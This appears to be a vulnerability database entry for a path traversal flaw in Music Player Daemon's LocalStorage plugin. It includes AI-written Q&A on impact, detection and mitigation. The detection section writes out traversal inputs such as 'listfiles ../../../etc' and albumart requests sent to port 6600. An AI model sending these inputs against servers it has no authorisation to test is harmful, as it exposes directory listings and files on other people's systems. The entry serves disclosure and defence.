CVE-2026-49128
Path Traversal in Music Player Daemon Local Storage Plugin
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| music_player_daemon | mpd | to 0.24.11 (exc) |
| musicplayerdaemon | mpd | to 0.24.11 (exc) |
| musicplayerdaemon | mpd | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-49128 is a path traversal vulnerability in Music Player Daemon (MPD) versions before 0.24.11, specifically in the LocalStorage plugin's functions LocalStorage::MapFSOrThrow and LocalStorage::MapUTF8.
The vulnerability arises because the software constructs filesystem paths by directly concatenating a user-supplied URI with the storage root without proper canonicalization. This allows path traversal sequences like ".." to escape the intended directory.
An unauthenticated attacker can exploit this flaw using the listfiles command to enumerate names, sizes, and modification times of arbitrary directories readable by the MPD process, and the albumart command to read specific image files (such as cover.png, cover.jpg, cover.jxl, cover.webp) from directories outside the configured music directory.
How can this vulnerability impact me? :
This vulnerability allows an unauthenticated attacker to perform unauthorized directory enumeration and limited file disclosure on the system where MPD is running.
Specifically, the attacker can use the listfiles command to reveal directory contents, including file names, sizes, and modification times, of any directories that the MPD process has read access to. This could include sensitive system directories like /etc, /usr, /var, or user home directories.
Additionally, the attacker can use the albumart command to read certain image files outside the intended music directory, potentially exposing files named cover.png, cover.jpg, cover.jxl, or cover.webp, or files accessible via manipulated symlinks.
Overall, this can lead to unauthorized information disclosure and potential privacy or security risks depending on the files accessible by the MPD process.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending crafted unauthenticated commands to the Music Player Daemon (MPD) server, typically running on port 6600, to check for unauthorized directory traversal.
- Use the `listfiles` command with path traversal sequences (e.g., `listfiles ..` or `listfiles ../../../etc`) to enumerate directory contents outside the intended music directory.
- Use the `albumart` command with a path containing traversal sequences to attempt reading image files like `cover.png` or `cover.jpg` from directories outside the configured music directory.
If these commands return directory listings or image files from unauthorized locations, it indicates the presence of the vulnerability.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade Music Player Daemon (MPD) to version 0.24.11 or later, where the vulnerability has been fixed by adding validation to prevent unsafe relative URIs.
Until the upgrade can be applied, restrict network access to the MPD server port (default 6600) to trusted clients only, preventing unauthenticated attackers from sending crafted commands.
Additionally, review and tighten filesystem permissions for the MPD process to limit its read access to only necessary directories, reducing the impact of potential exploitation.